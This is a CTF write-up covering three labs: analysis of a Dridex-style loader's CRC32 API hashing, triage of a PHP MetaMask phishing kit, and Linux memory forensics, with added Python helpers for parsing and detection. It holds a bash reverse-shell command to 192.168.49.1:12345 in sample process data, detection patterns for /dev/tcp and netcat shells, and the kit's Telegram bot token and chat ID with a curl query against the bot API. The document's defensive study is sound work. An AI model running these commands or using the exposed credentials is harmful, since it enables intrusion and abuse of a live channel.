CyberDefenders practice 3

Preface

Continuing with forensics :)

$tealer (malware analysis)

question1

The provided sample is fully unpacked. How many sections does the sample contain?

Looking at the sample in PE-bear, there are 4 sections in total.

answer:4

question2

How many imported windows APIs are being used by the sample?

Looking at Imports in PE-bear, the sample imports from KERNEL32.dll, which accounts for 2 APIs.

answer:2

question3

The sample is resolving the needed win APIs at run-time using API hashing. Looking at the DllEntryPoint, which function is responsible for resolving the wanted APIs?

Decompile in IDA and go into DllEntryPoint. There are not many functions inside, so trying each one works; going by the question's description I picked the function called in the if statement, and it was accepted.

answer:sub_6015C0

question4

Looking inside the function described in question 3, which function is responsible for locating & retrieving the targetted module (DLL)?

hinstDLL is the handle of the DLL instance, that is, the DLL's location in the process address space, and v4 = hinstDLL, so look for the function that takes v4. The obvious one is sub_607560, but that is not the answer; following it in, it simply does return sub_607564(a1).

answer:sub_607564

question5

What type of hashing is being used for the API hashing technique?

Look for the hashing logic inside sub_607564, again following the if statement, which leads to sub_61D620; stepping into it shows that it is CRC32.

answer:CRC32

question6

What is the address of the function which performs the hashing?

Since it is named sub_61D620, its address is of course 0x61D620.

answer:0x61D620

question7

What key is being used for XORing the hashed names?

Going back to sub_607564, we see if ( v2 == (sub_61D620((int)v43, v16) ^ 0x38BA5C7B) )

answer:0x38BA5C7B

question8

What information is being accessed at the address 0X60769A?

The code at the target address:

mov esi, [esi+18h]
test esi, esi
jz short loc_60768B

We can see that the information passed here is esi, and once it is passed the function exits right away. I stared at this esi for a long time without making sense of it, then noticed these lines inside:

LABEL_12:
    ProcessEnvironmentBlock = NtCurrentTeb()->ProcessEnvironmentBlock;
    if ( v5 )
        return ProcessEnvironmentBlock->ImageBaseAddress;
    Ldr = ProcessEnvironmentBlock->Ldr;
    Flink = Ldr->InLoadOrderModuleList.Flink;
    Blink = Ldr->InLoadOrderModuleList.Blink;

So I just tried a few answers, and one of them worked.

answer:BaseAddress

question9

Looking inside the function described in question 3, which function is responsible for locating & retrieving the targetted API from the module export table?

Because DllEntryPoint operates on dword_62B1D4, I traced it to dword_62B1D4 = (int (__stdcall *)(_DWORD))sub_6015C0(-1590620315, 497732535);. That function turned out to be wrong, so I went in and looked at its return; it returns another function, and trying that one was correct.

answer:sub_6067C8

question10

Diving inside the function described in question 8, what is being accessed at offset 0X3C within the first passed parameter?

I could not make sense of this one at all; it involves the hex layout of the PE file. I referred to this article:
PE文件学习笔记(一):DOS头与PE头解析 (PE file study notes (1): parsing the DOS header and PE header)
Offset 0x3c in the DOS header corresponds to e_lfanew.

answer:e_lfanew
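As an added example (not the CTF sample and not the writeup's code), here is a Python walk of the same header chain the loader follows: e_lfanew at DOS offset 0x3C leads to the PE signature and the IMAGE_FILE_HEADER, whose NumberOfSections is what question 1 counted. The PE image is constructed inside the script; the 4-section count and the 0x80 e_lfanew are chosen values, not read from the sample.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C


def build_min_pe(num_sections: int, e_lfanew: int = 0x80) -> bytes:
    """Construct a minimal PE image for this example (not the CTF sample):
    a DOS header with e_lfanew at offset 0x3C, padding up to e_lfanew,
    then the PE signature and an IMAGE_FILE_HEADER."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)      # 0x40-byte IMAGE_DOS_HEADER
    struct.pack_into("<I", dos, 0x3C, e_lfanew)    # e_lfanew field
    padding = b"\x00" * (e_lfanew - len(dos))
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader,
    # Characteristics (0x2102 = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL).
    file_header = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386,
                              num_sections, 0, 0, 0, 0xE0, 0x2102)
    return bytes(dos) + padding + b"PE\x00\x00" + file_header


def parse_headers(image: bytes) -> dict:
    """Follow the chain the loader in question 10 follows: read e_lfanew at
    DOS offset 0x3C, check the PE signature there, then read Machine and
    NumberOfSections from the IMAGE_FILE_HEADER that follows it."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("missing or truncated DOS header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if e_lfanew + 24 > len(image):
        raise ValueError("e_lfanew points past the end of the image")
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature at e_lfanew")
    machine, num_sections = struct.unpack_from("<HH", image, e_lfanew + 4)
    return {"e_lfanew": e_lfanew, "machine": machine,
            "num_sections": num_sections}


if __name__ == "__main__":
    # A 4-section DLL like the $tealer sample (count chosen for the demo).
    print(parse_headers(build_min_pe(4)))
```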

question11

Which windows API is being resolved at the address 0X5F9E47 ?

This one was a major blind spot for me. The hint:

googled more on dridex and apis
guessed at virtualalloc -nope

So it even comes down to guessing. I searched for dridex apis and found nothing much after a long look, so I simply went through the APIs provided by Kernel32.dll, following the reference material, until I tried the right one.

answer:CreateThread

question12

Looking inside sub_607980, which DLL is being resolved?

To find the DLL you go through sub_606C50; its argument is 1485485034, so XOR that with 0x38ba5c7b and then match it against the CRC32.

answer:ntdll.dll
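Added example (not from the writeup or the loader itself): a Python reimplementation of the hashing scheme recovered in questions 5 to 7, CRC32 of the name XORed with 0x38BA5C7B, plus a brute-force lookup that maps a hash back to a name from a candidate list, which is the lookup question 12 performs by hand. The candidate lists are constructed; the 1485485034 value from question 12 is tried against them at run time, and because the writeup does not show which spelling the loader hashes, each candidate is also tried in lower and upper case.

```python
import zlib
from typing import Iterable, Optional

# XOR key recovered from the comparison in sub_607564 (question 7).
XOR_KEY = 0x38BA5C7B


def api_hash(name: str) -> int:
    """Hash a DLL or API name the way the loader does: CRC32 of the ASCII
    name (question 5), then XOR with the constant key (question 7)."""
    return (zlib.crc32(name.encode("ascii")) ^ XOR_KEY) & 0xFFFFFFFF


def name_variants(name: str) -> Iterable[str]:
    """Spellings to try: the decompilation alone does not show which case
    the loader hashes, so original, lower and upper case are all tried."""
    seen = set()
    for variant in (name, name.lower(), name.upper()):
        if variant not in seen:
            seen.add(variant)
            yield variant


def resolve_hash(target: int, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate spelling whose hash equals `target`, or None.
    IDA prints these constants as signed ints, so mask to 32 bits first."""
    target &= 0xFFFFFFFF
    for cand in candidates:
        for variant in name_variants(cand):
            if api_hash(variant) == target:
                return variant
    return None


# Constructed candidate lists; for a real sample, feed in the export
# names of the DLLs the loader can reach (kernel32.dll, ntdll.dll, ...).
DLL_CANDIDATES = ["kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll"]
API_CANDIDATES = ["CreateThread", "VirtualAlloc", "LoadLibraryA",
                  "GetProcAddress", "RtlAddVectoredExceptionHandler"]

if __name__ == "__main__":
    # Argument passed to sub_606C50 in question 12; result shown at run time.
    print("1485485034 ->", resolve_hash(1485485034, DLL_CANDIDATES))
    h = api_hash("CreateThread")
    print(hex(h), "->", resolve_hash(h, API_CANDIDATES))
```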

question13

Also Looking inside sub_607980, which API is being resolved?

The hint points to an article:
Dridex Loader Analysis
Comparing the characteristics described there gives the API.

answer:RtlAddVectoredExceptionHandler

I really could not get through the other half of the questions, so I am leaving them for now (.

GrabThePhisher (web forensics)

question1

Which wallet is used for asking the seed phrase?

The source folder contains one called metamask; a quick search shows that this is a type of wallet.

answer:metamask

question2

What is the file name that has the code for the phishing kit?

The code file of the phishing site is right there once you enter the metamask folder.

answer:metamask.php

question3

In which language was the kit written?

Well, they are all php files; what language could it be other than php?

answer:php

question4

What service does the kit use to retrieve the victim's machine information?

Look in metamask.php and locate $request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']); ; adjusting the format and capitalization gives the answer.

answer:Sypex Geo

question5

How many seed phrases were already collected?

From metamask.php we know the wallets are stored in log/log.txt; checking it shows 3 wallets.

answer:3

question6

Write down the seed phrase of the most recent phishing incident?

It is the third line in log.txt.

answer:father also recycle embody balance concert mechanic believe owner pair muffin hockey

question7

Which medium had been used for credential dumping?

Back in metamask.php, locate $filename = "https://api.telegram.org/bot".$token....; we can see that Telegram is used to transfer the data.

answer:telegram

question8

What is the token for the channel?

Still in metamask.php.

answer:5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

question9

What is the chat ID of the phisher's channel?

Still in metamask.php, again.

answer:5442785564

question10

What are the allies of the phish kit developer?

Still in metamask.php, yet again.

answer:j1j1b1s@m3r0
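Added example (not the kit's own code): a small Python triage script that pulls out of a kit's PHP source the indicators the questions above locate by hand, namely the geo-IP host, the Telegram bot host, the $token and $chat_id values, and the local log file the seed phrases are written to. The PHP fragment inside is constructed to mirror the lines quoted from metamask.php, with a placeholder token and chat ID rather than the kit's real values.

```python
import re

# Constructed PHP fragment mirroring the lines the writeup quotes from
# metamask.php; token and chat ID are placeholders, not the kit's values.
SAMPLE_KIT = r'''<?php
$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']);
$token = "0000000000:PLACEHOLDER_BOT_TOKEN";
$chat_id = "0000000000";
file_put_contents("log/log.txt", $seed . "\n", FILE_APPEND);
$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$message;
file_get_contents($filename);
'''

HOST_RE = re.compile(r'https?://([A-Za-z0-9.-]+)')
VAR_RE = re.compile(r'\$(token|chat_id)\s*=\s*["\']([^"\']*)["\']')
LOG_RE = re.compile(r'(?:file_put_contents|fopen)\(\s*["\']([^"\']+)["\']')


def triage_kit(source: str) -> dict:
    """Extract the indicators a responder wants from a PHP phishing kit:
    remote hosts contacted, the Telegram bot token and chat ID if the kit
    hard-codes them, and the local files it writes (where phrases end up)."""
    hosts = sorted(set(HOST_RE.findall(source)))
    variables = dict(VAR_RE.findall(source))
    return {
        "hosts": hosts,
        "geoip_lookup": [h for h in hosts if "sypexgeo" in h],
        "telegram_exfil": "api.telegram.org" in hosts,
        "bot_token": variables.get("token"),
        "chat_id": variables.get("chat_id"),
        "log_files": sorted(set(LOG_RE.findall(source))),
    }


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(f"{key}: {value}")
```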

question11

What is the full name of the Phish Actor?

Just curl that Telegram API: curl https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564

answer:Marcus Aurelius

question12

What is the username of the Phish Actor?

Same API as above.

answer:pumpkinboii

Seized (Linux memory forensics)

question1

What is the CentOS version installed on the machine?

Run python2 vol.py -f ../dump.mem --profile=LinuxCentos7_3_10_1062x64 linux_banner; it shows that the Linux kernel version is 3.10.0-1062.el7.x86_64, so look up which CentOS version ships that kernel.

answer:7.7.1908

question2

There is a command containing a strange message in the bash history. Will you be able to read it?

Use python2 vol.py -f ../dump.mem --profile=LinuxCentos7_3_10_1062x64 linux_bash to view the bash history; there is a base64 string, and decoding it gives the answer.

answer:shkCTF{l3ts_st4rt_th3_1nv3st_75cc55476f3dfe1629ac60}

question3

What is the PID of the suspicious process?

Use python2 vol.py -f ../dump.mem --profile=LinuxCentos7_3_10_1062x64 linux_psaux to view each process's command line and start time; the process with PID 2854 ran a suspicious reverse shell command.

answer:2854

question4

The attacker downloaded a backdoor to gain persistence. What is the hidden message in this backdoor?

It only says there is a backdoor and gives no other information. Searching for anything backdoor-related found nothing, but looking back at the bash history showed that something called PythonBackup had been downloaded. Analyzing the related file PythonBackup.py and following what it calls led to snapshot.py, which contains the link https://pastebin.com/raw/nQwMKjtZ; curl it to get a base64 string, and decoding it gives the answer.

answer:shkCTF{th4t_w4s_4_dumb_b4ckd00r_86033c19e3f39315c00dca}

question5

What are the attacker's IP address and the local port on the targeted machine?

We saw earlier that the reverse shell port is 12345, so we can filter when searching for the port: python2 vol.py -f ../dump.mem --profile=LinuxCentos7_3_10_1062x64 linux_netstat | grep 12345

answer:192.168.49.1:12345

question6

What is the first command that the attacker executed?

Just look at psaux again.

answer:python -c import pty; pty.spawn(“/bin/bash”)

question7

After changing the user password, we found that the attacker still has access. Can you find out how?

We dump the last /bin/bash process: linux_dump_map --pid 2887 -D ../bash1, then put the contents into a txt file and search for the flag format and for base64; the answer is stored as base64.

answer:shkCTF{rc.l0c4l_1s_funny_be2472cfaeed467ec9cab5b5a38e5fa0}

question8

What is the name of the rootkit that the attacker used?

Look at dmesg:

[172141977023.172] sysemptyrect: loading out-of-tree module taints kernel.
[172142219596.172] sysemptyrect: module verification failed: signature and/or required key missing - tainting kernel
[172143083725.172] CRC65: rdy to encrypt stuff!

answer:sysemptyrect
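Added example, not part of the writeup: Python detection logic for the two findings above, reverse-shell and shell-upgrade command lines in linux_psaux output (questions 3, 5 and 6) and out-of-tree or unsigned module loads in dmesg (question 8). The psaux lines are constructed in the shape of Volatility's output and reuse the 192.168.49.1:12345 endpoint from question 5; the dmesg lines are the ones quoted above.

```python
import re

# Constructed lines in the shape of Volatility's linux_psaux output
# (Pid Uid Gid Arguments); the endpoint is the one found in question 5.
PSAUX_LINES = [
    "1234   0      0      /usr/sbin/sshd -D",
    "2854   1000   1000   bash -i >& /dev/tcp/192.168.49.1/12345 0>&1",
    "2887   1000   1000   /bin/bash",
    "2901   1000   1000   python -c import pty; pty.spawn(\"/bin/bash\")",
]

# dmesg lines quoted in question 8.
DMESG_LINES = [
    "[172141977023.172] sysemptyrect: loading out-of-tree module taints kernel.",
    "[172142219596.172] sysemptyrect: module verification failed: signature and/or required key missing - tainting kernel",
    "[172143083725.172] CRC65: rdy to encrypt stuff!",
]

SHELL_PATTERNS = [
    (re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"), "bash reverse shell"),
    (re.compile(r"pty\.spawn\("), "pty shell upgrade"),
    (re.compile(r"\bnc\b.*\s-e\s"), "netcat -e shell"),
]
MODULE_RE = re.compile(
    r"\]\s+(\w+): (?:loading out-of-tree module|module verification failed)")


def flag_processes(lines):
    """Return (pid, reason, matched_text) for command lines that look like
    reverse shells or interactive shell upgrades."""
    hits = []
    for line in lines:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, args = int(parts[0]), parts[3]
        for pattern, reason in SHELL_PATTERNS:
            match = pattern.search(args)
            if match:
                hits.append((pid, reason, match.group(0)))
                break
    return hits


def flag_modules(lines):
    """Return names of kernel modules that dmesg reports as out-of-tree or
    failing signature verification, which is how the rootkit shows up."""
    return sorted({m.group(1) for m in map(MODULE_RE.search, lines) if m})


if __name__ == "__main__":
    for hit in flag_processes(PSAUX_LINES):
        print("suspicious process:", hit)
    print("tainting modules:", flag_modules(DMESG_LINES))
```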

question9

The rootkit uses crc65 encryption. What is the key?

Just search: strings dump.mem |grep crc65

answer:1337tibbartibbar